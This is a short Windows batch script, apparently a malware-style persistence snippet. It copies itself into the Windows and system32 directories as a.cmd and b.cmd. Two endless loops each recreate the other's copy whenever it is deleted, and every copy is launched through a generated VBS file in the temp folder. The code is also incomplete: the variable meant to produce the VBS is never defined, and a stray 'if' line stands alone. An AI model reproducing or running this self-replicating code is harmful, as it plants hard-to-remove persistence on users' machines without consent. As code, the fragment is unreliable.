@echo off
goto %~1
:a
if not exist %windir%\b.cmd more %0 >%windir%\b.cmd & call :run %windir%\b.cmd b
goto a
:b
if not exist %windir%\system32\a.cmd more %0 >%windir%\system32\a.cmd & call :run %windir%\system32\a.cmd a
goto b
if
:run
%生成vbs% >%tmp%\c.vbs
%tmp%\c.vbs %*
exit /b